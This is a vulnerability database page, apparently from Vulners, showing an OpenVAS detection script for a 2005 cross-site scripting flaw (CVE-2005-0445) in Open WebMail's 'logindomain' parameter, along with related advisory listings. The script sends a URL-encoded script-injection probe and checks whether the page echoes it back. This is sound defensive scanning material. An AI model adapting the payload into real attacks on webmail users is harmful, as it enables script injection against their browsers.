| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| OpenWebmail openwebmail.pl logindomain Parameter XSS | 15 Feb 200500:00 | – | nessus | |
| Open WebMail openwebmail.pl logindomain Parameter XSS | 16 Feb 200500:00 | – | nessus | |
| CVE-2005-0445 | 15 Feb 200505:00 | – | cve | |
| CVE-2005-0445 | 15 Feb 200505:00 | – | cvelist | |
| EUVD-2005-0446 | 7 Oct 202500:30 | – | euvd | |
| CVE-2005-0445 | 2 May 200504:00 | – | nvd | |
| Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability | 3 Nov 200500:00 | – | openvas |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/12547 |
| openwebmail | www.openwebmail.org/openwebmail/download/cert/advisories/SA-05:01.txt |
# SPDX-FileCopyrightText: 2005 George A. Theall
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:openwebmail.acatysmoof:openwebmail";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.16463");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_cve_id("CVE-2005-0445");
script_xref(name:"OSVDB", value:"13788");
script_name("Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2005 George A. Theall");
script_family("Web application abuses");
script_dependencies("openwebmail_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("OpenWebMail/detected");
script_xref(name:"URL", value:"http://openwebmail.org/openwebmail/download/cert/advisories/SA-05:01.txt");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/12547");
script_tag(name:"solution", value:"Upgrade to Open WebMail version 2.50 20040212 or later.");
script_tag(name:"summary", value:"The remote webmail server is affected by a cross-site scripting flaw.
The remote host is running at least one instance of Open WebMail that
fails to sufficiently validate user input supplied to the 'logindomain'
parameter. This failure enables an attacker to run arbitrary script
code in the context of a user's web browser.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );
if( dir == "/" ) dir = "";
# We test whether the hole exists by trying to echo magic (urlencoded
# as alt_magic for http) and checking whether we get it back.
magic = "logindomain xss vulnerability";
alt_magic = str_replace( string:magic, find:" ", replace:"%20" );
url = dir + "/openwebmail.pl?logindomain=%22%20/%3E%3Cscript%3Ewindow.alert('" + alt_magic + "')%3C/script%3E";
req = http_get( item:url, port:port );
res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
if( isnull( res ) ) exit( 0 ); # can't connect
if( res =~ "^HTTP/1\.[01] 200" && egrep( string:res, pattern:magic ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation